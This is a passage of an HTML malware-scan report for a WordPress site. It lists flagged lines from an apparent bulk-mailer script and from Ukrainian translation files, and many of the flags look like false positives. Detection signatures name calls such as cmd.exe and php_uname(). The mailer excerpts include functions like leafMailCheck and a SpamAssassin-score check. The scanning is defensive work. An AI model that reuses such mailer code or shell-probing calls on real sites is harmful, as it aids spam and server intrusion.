</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$errorMsg</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafheader</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafTrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4409</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span><span style="color: #DD0000">">check SpamAssassin Score</a></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">randString</span><span style="color: #007700">(</span><span style="color: #0000BB">$consonants</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$password</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafMailCheck</span><span style="color: #007700">(</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 57</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 593</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$level</span><span style="color: #007700">) {echo </span><span style="color: #DD0000">"debug level </span><span style="color: #0000BB">$level</span><span style="color: #DD0000">; message: </span><span style="color: #0000BB">$str</span><span style="color: #DD0000">"</span><span style="color: #007700">;};</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 626</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_path</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 687</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 689</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that handles the result of the send email action</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 704</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 910</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$exceptions </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 922</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__destruct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 939</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailPassthru</span><span style="color: #007700">(</span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$params</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 943</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to avoid double</span><span style="color: #007700">-</span><span style="color: #0000BB">encoding</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 951</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mail</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 957</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 966</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edebug</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 971</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">names</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4341</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1732</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cmd</span><span style="color: #007700">.</span><span style="color: #0000BB">exe</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_182").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/languages/continents-cities-uk.l10n.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.21 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2025-12-02 12:29:28</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_183" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return [</span><span style="color: #DD0000">'x-generator'</span><span style="color: #007700">=></span><span style="color: #DD0000">'GlotPress/4.0.1'</span><span style="color: #007700">,</span><span style="color: #DD0000">'translation-revision-date'</span><span style="color: #007700">=></span><span style="color: #DD0000">'2022-12-31 20:56:37+0000'</span><span style="color: #007700">,</span><span style="color: #DD0000">'plural-forms'</span><span style="color: #007700">=></span><span style="color: #DD0000">'nplurals=3; plural=(n % 10 == 1 && n % 100 != 11) ? 0 : ((n % 10 >= 2 && n % 10 <= 4 && (n % 100 < 12 || n % 100 > 14)) ? 1 : 2);'</span><span style="color: #007700">,</span><span style="color: #DD0000">'project-id-version'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_183").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/languages/admin-uk.l10n.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 510.55 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2025-12-02 12:29:28</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_184" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 106</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">Name</span><span style="color: #007700">&</span><span style="color: #0000BB">hellip</span><span style="color: #007700">;</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Назва функції</span><span style="color: #007700">&</span><span style="color: #0000BB">hellip</span><span style="color: #007700">;</span><span style="color: #DD0000">','</span><span style="color: #0000BB">Activate Plugin </span><span style="color: #007700">&</span><span style="color: #0000BB">amp</span><span style="color: #007700">; </span><span style="color: #0000BB">Run Importer</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Активувати плагін і запустити імпорт</span><span style="color: #DD0000">','</span><span style="color: #0000BB">You can add </span><span style="color: #007700">or </span><span style="color: #0000BB">edit links on this screen by entering information in each of the boxes</span><span style="color: #007700">. </span><span style="color: #0000BB">Only the l</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 108</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">me to the plugin </span><span style="color: #007700">list</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Ні</span><span style="color: #007700">, </span><span style="color: #0000BB">повернутись до списку плагінів</span><span style="color: #DD0000">','</span><span style="color: #0000BB">Yes</span><span style="color: #007700">, </span><span style="color: #0000BB">delete these files</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Так</span><span style="color: #007700">, </span><span style="color: #0000BB">видалити ці файли</span><span style="color: #DD0000">','</span><span style="color: #0000BB">Are you sure you want to delete these files</span><span style="color: #007700">?</span><span style="color: #DD0000">'=>'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 110</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">to the Plugin Installer</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Повернутися до встановлювача плагінів</span><span style="color: #DD0000">','</span><span style="color: #0000BB">Successfully installed the plugin </span><span style="color: #007700"><</span><span style="color: #0000BB">strong</span><span style="color: #007700">>%</span><span style="color: #0000BB">1$s </span><span style="color: #007700">%</span><span style="color: #0000BB">2$s</span><span style="color: #007700"></</span><span style="color: #0000BB">strong</span><span style="color: #007700">>.</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Плагін </span><span style="color: #007700"><</span><span style="color: #0000BB">strong</span><span style="color: #007700">>%</span><span style="color: #0000BB">1$s </span><span style="color: #007700">%</span><span style="color: #0000BB">2$s</span><span style="color: #007700"></</span><span style="color: #0000BB">strong</span><span style="color: #007700">> </span><span style="color: #0000BB">успішно встановлений</span><span style="color: #007700">.</span><span style="color: #DD0000">','</span><span style="color: #0000BB">Activate</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">to the restored version</span><span style="color: #007700">.</span><span style="color: #DD0000">'=>'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">call</span><span style="color: #007700">. </span><span style="color: #0000BB">This interferes with correct calculations of dates </span><span style="color: #007700">and </span><span style="color: #0000BB">times</span><span style="color: #007700">.</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Часовий пояс PHP за замовчуванням змінений після завантаження WordPress викликом функції </span><span style="color: #007700">%</span><span style="color: #0000BB">s</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has been disabled</span><span style="color: #007700">.</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Неможливо визначити деякі налаштування</span><span style="color: #007700">, </span><span style="color: #0000BB">оскільки функція </span><span style="color: #007700">%</span><span style="color: #0000BB">s була відключена</span><span style="color: #007700">.</span><span style="color: #DD0000">','</span><span style="color: #0000BB">Server settings</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Налаштування сервера</span><span style="color: #DD0000">','</span><span style="color: #0000BB">PHP SAPI</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">PHP SAPI</span><span style="color: #DD0000">','</span><span style="color: #007700">(</span><span style="color: #0000BB">Does not</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 76</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functionality</span><span style="color: #007700">.</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Увімкнути редактор на всю висоту та режим зосередженого письма</span><span style="color: #007700">.</span><span style="color: #DD0000">','</span><span style="color: #0000BB">https</span><span style="color: #007700">:</span><span style="color: #FF8000">//planet.wordpress.org/feed/'=>'https://planet.wordpress.org/feed/','https://planet.wordpress.org/'=>'https://planet.wordpr</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 80</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">in another WordPress installation to import the content from this site</span><span style="color: #007700">.</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Коли ви збережете файл</span><span style="color: #007700">, </span><span style="color: #0000BB">ви зможете використовувати функцію імпорту на іншому сайті WordPress</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">SUHOSIN</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_184").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/languages/uk.l10n.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 397.24 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2025-12-02 12:29:28</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_185" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">.</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Умовні теґи запитів не працюють до здійснення запиту</span><span style="color: #007700">. </span><span style="color: #0000BB">До того</span><span style="color: #007700">, </span><span style="color: #0000BB">вони завжди повертають </span><span style="color: #DD0000">"false,'The user is already active.'=>'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 242</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function. </span><span style="color: #0000BB">See </span><span style="color: #007700">%</span><span style="color: #0000BB">4$s</span><span style="color: #007700">.</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">У </span><span style="color: #007700">%</span><span style="color: #0000BB">1$s використовуйте метод </span><span style="color: #007700">%</span><span style="color: #0000BB">2$s</span><span style="color: #007700">, </span><span style="color: #0000BB">а не функцію </span><span style="color: #007700">%</span><span style="color: #0000BB">3$s</span><span style="color: #007700">. </span><span style="color: #0000BB">Див</span><span style="color: #007700">. %</span><span style="color: #0000BB">4$s</span><span style="color: #007700">.</span><span style="color: #DD0000">','</span><span style="color: #0000BB">The handler </span><span style="color: #007700">for </span><span style="color: #0000BB">the route is invalid</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Обробник маршруту невірний</span><span style="color: #DD0000">','</span><span style="color: #0000BB">Posts </span><span style="color: #007700">list</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Список записів</span><span style="color: #DD0000">','</span><span style="color: #0000BB">Pages li</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">/</span><span style="color: #0000BB">is_main_query</span><span style="color: #007700">/</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">https</span><span style="color: #007700">:</span><span style="color: #FF8000">//developer.wordpress.org/reference/functions/is_main_query/','Filter by category'=>'Фільтр по категорії','The confirmation key has expired for this personal data request.'=>'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 334</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">focus to the editor press Escape </span><span style="color: #007700">or use </span><span style="color: #0000BB">one of the buttons</span><span style="color: #007700">.</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Щоб перемістити фокус до інших кнопок</span><span style="color: #007700">, </span><span style="color: #0000BB">використовуйте Tab</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 336</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">to this page</span><span style="color: #007700">.</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Сторінка входу відкриється в новому вікні</span><span style="color: #007700">. </span><span style="color: #0000BB">Після входу ви можете закрити вікно і повернутися до поточної сторінці</span><span style="color: #007700">.</span><span style="color: #DD0000">','</span><span style="color: #007700">%</span><span style="color: #0000BB">s </span><span style="color: #007700"><</span><span style="color: #0000BB">span </span><span style="color: #007700">class=</span><span style="color: #DD0000">"says"</span><span style="color: #007700">></span><span style="color: #0000BB">says</span><span style="color: #007700">:<</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 358</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">can be used in an uninstall hook</span><span style="color: #007700">.</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Для видалення можна використовувати тільки статичний метод класу або функцію</span><span style="color: #007700">.</span><span style="color: #DD0000">','</span><span style="color: #0000BB">Passing an integer number of posts is deprecated</span><span style="color: #007700">. </span><span style="color: #0000BB">Pass an </span><span style="color: #007700">array </span><span style="color: #0000BB">of argumen</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 374</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
